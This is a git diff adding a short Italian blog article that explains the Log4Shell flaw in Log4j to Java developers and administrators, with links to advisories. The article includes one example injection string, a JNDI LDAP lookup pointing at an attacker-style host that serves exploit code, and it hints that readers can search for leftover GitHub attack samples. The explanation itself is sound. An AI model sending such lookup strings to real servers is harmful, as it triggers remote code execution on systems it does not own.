diff options
| author |   Alessandro Iezzi <aiezzi@alessandroiezzi.it> | 2021-12-27 15:58:27 +0100 |
|---|---|---|
| committer | Alessandro Iezzi <aiezzi@alessandroiezzi.it> | 2021-12-27 15:58:27 +0100 |
| commit | bd13286d87e6273db0f55e8fd95ba3730171def4 (patch) | |
| tree | e577625a7afbe553925c8c99e2c50ae302a32362 /articles/2021/20211213_log4shell-0-day-vulnerability.rhtml | |
| download | website-bd13286d87e6273db0f55e8fd95ba3730171def4.tar.gz website-bd13286d87e6273db0f55e8fd95ba3730171def4.zip | |
Initial commit
Diffstat (limited to 'articles/2021/20211213_log4shell-0-day-vulnerability.rhtml')
| -rw-r--r-- | articles/2021/20211213_log4shell-0-day-vulnerability.rhtml | 34 |
1 files changed, 34 insertions, 0 deletions
diff --git a/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml b/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml new file mode 100644 index 0000000..cca7617 --- /dev/null +++ b/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml @@ -0,0 +1,34 @@ +<h1>Gravi vulnerabilità in Log4j</h1> +<div class="hyphens"> + <p class="date-published">Alessandro Iezzi, 13 dicembre 2021</p> + <p class="italic">Questa vulnerabilit\à interessa solo amministratori + di sistema e programmatori Java e non i normali utenti.</p> + + <p>La modalità di attacco è molto semplice. Molte volte, si + tende a scrivere log di questo tipo: + <code>log.info("User input: {}", userInput)</code> e non c'è nulla + di sbagliato. Se l'utente prova ad inviare una stringa formata, per esempio, + in questo modo: <code>jndi:ldap://hacking.it/Exploit</code> entra in azione + la classe <code>JndiLookup</code> di <code>log4j-core</code>. La libreria, + effettua una chiamata verso quel server LDAP che gli risponderà con + l'URL di un sito web contenente l'exploit. L'exploit verrà eseguito + sul server da Log4j, rendendo inutili strumenti quali firewall e IDS/IPS. + </p> + + <p class="italic">Alcuni utenti su GitHub avevano messo esempi di attacco ma + ad oggi (16 dicembre 2021) sono spariti. Se effettuate qualche ricerca, + forse riuscite a trovare ancora qualcosa.</p> + + <p class="italic">Ho sentito un'intervista alla radio, l'intervistato + consigliava di aggiornare varie applicazioni mobile e sul computer + nonché il sistema operativo. Questi consigli valgono sempre, + a prescindere dalle vulnerabilità, in questo caso, l'utente tipico + NON deve fare assolutamente nulla, visto che la problematica riguarda noi + programmatori e amministratori di sistema.</p> + + <h2>Riferimenti</h2> + <ul> + <li><a href="https://logging.apache.org/log4j/2.x/security.html">https://logging.apache.org/log4j/2.x/security.html</a></li> + <li><a href="https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/">https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/</a></li> + </ul> +</div> |